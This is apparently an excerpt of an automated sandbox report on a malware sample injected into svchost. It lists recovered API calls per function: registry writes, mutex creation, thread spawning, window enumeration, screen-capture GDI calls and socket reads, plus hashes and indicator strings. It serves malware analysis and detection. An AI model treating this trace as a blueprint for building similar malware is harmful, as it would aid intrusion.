                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87916FB2600746AFC714DF68D88496AB7E9FF98314F048B69F82987644E770E914CBE1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,02C82840,?), ref: 02C97C1A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97C1D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 604365451-0
                                                                                                                                                                                                                    • Opcode ID: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                                    • Instruction ID: a6b2414cb3c24528592f7f4772f15661689a7160a35fdfdeb1d03fa4dc6205d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9315EF19467449FDB319F669C88B12FBE8FF84714F00892EE28A97641C370A544CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75110
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7513C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75163
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C75184
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002C4,000003E8), ref: 02C751B4
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(000002C4), ref: 02C751D5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C751EE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2971961948-3387790918
                                                                                                                                                                                                                    • Opcode ID: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
                                                                                                                                                                                                                    • Instruction ID: 624dc36d533c102a67ddf76a704838ae94d69d864442ab1e9e144c3c66c6519f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B41B975E40208EFDB40DFA9D884AEDBBF5FB88351F51456AE904E7200E774AA01CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C75218
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75249
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75275
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7529C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002C4,000003E8), ref: 02C752CD
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(000002C4), ref: 02C752EE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C752F8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2971961948-3387790918
                                                                                                                                                                                                                    • Opcode ID: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                                    • Instruction ID: 30c5bc5ae0f3d323f0229e5c14f4cc7f50c54d2b51a2aeee4670010bc99a5d1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB31B5B5E40258AFDB40DFE9D884ADDBBF9FB48310F50856AE918E7240E7749A11CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C80710
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8072E
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02C807CD
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(-80000001,80F50209a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02C807EF
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C807FD
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C80810
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80F50209a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2470402893-520226336
                                                                                                                                                                                                                    • Opcode ID: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                                    • Instruction ID: fcc44ad502bfe9a342a1e66f398fc18f980509a9af6c2acc1215a477518a3881
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF31F870A04248AFEB15EB74DC88FEE77A9DF54708F1085A8E585D7141E6709EC98B90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\private\), ref: 02C8AB49
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8AAF0,00000000,00000000,00000000), ref: 02C8AB96
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\public\), ref: 02C8ABAE
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8AAD0,00000000,00000000,00000000), ref: 02C8ABF2
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AC0A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8AC1B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                                    • String ID: \private\$\public\
                                                                                                                                                                                                                    • API String ID: 677819612-281496920
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                                    • GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 3748940024-4251816714
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C7C8E0,00000000,00000000,00000000), ref: 02C7C924
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C93C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500,?), ref: 02C7C94D
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C95C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C990
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7C997
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7C9AB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 731183410-3387790918
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,?,?,?,?,00000000,?,?,?), ref: 02C7E682
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7E6A8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7E6AF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E6BF
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E6CA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7E6F9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7E71A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E72E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E735
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E745
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E74C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemcpy$AllocFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3046854561-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$malloc$CloseFileHandleReadselect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 158848325-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: select.WS2_32(?,?,00000000,00000000,?), ref: 02C9EB27
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9EB58
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000005,00000000), ref: 02C9EB7B
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000004,00000000), ref: 02C9EB9D
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: socket.WS2_32(00000002,00000001,00000000), ref: 02C9EBB6
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9EBD2
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C988B3
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 02C98987
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 02C989D2
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(00000000,?), ref: 02C98A64
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(user!226533!1CE3AAD1,?), ref: 02C98AB2
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C98B6F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SystemTime$recv$freemallocselectsetsockoptsocket
                                                                                                                                                                                                                    • String ID: user!226533!1CE3AAD1
                                                                                                                                                                                                                    • API String ID: 2153857484-4071781050
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C899E7
                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 02C89A0A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C89ADB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C89AEC
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C89AFC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcessVersionmemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 877405840-3024904723
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GdiFlush.GDI32(?,?,?), ref: 02C77926
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C77934
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,?), ref: 02C7794A
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C77956
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?), ref: 02C77963
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C77985
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 3485819771-3387790918
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7AB2F
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AB54
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7AB62
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32 ref: 02C7AB97
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AB9E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7ABAE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 1675675969-3387790918
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7A9AD
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A9CB
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32 ref: 02C7AA00
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AA07
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7AA1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000005), ref: 02C7AA2A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 699575883-3387790918
                                                                                                                                                                                                                    • Opcode ID: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                                    • Instruction ID: b57c32ef7cd3355056b50e60d3a575415a9a353647a6e2fe4b6cb4813c133737
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75014B349C0240AFE7169B20E84DBDA37A4FB98716F054BA8F5198B2D1CBB556A1CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9028E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C9029F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C902A6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C902B8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C902C9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90285
                                                                                                                                                                                                                    • P0#v, xrefs: 02C902A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 1893094850-2586879793
                                                                                                                                                                                                                    • Opcode ID: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                                    • Instruction ID: 7b5619f72061de97dfb8ba50d1b1332e428a752ab455fde5046a9974113a088f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0A730D826A4B7E7125BA09C0DBAE7A9CDF45B15F0046C0F805D3181D7B0861046A1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8A39E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A3AF
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A3B6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A3C8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A3D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}, xrefs: 02C8A395
                                                                                                                                                                                                                    • P0#v, xrefs: 02C8A3B6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0#v
                                                                                                                                                                                                                    • API String ID: 1893094850-253269245
                                                                                                                                                                                                                    • Opcode ID: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                                    • Instruction ID: 4841972f98751e0d98693809ac7c433629e7ee9a812505941e5fca44fe9b3815
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8F0EC31D81294F7E7125B94DC0DB9E7B5CDF0570AF004281FD0993180E7F08E1487A1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C776E8
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C77708
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 02C77711
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 02C7771D
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C77752
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C77771
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C77793
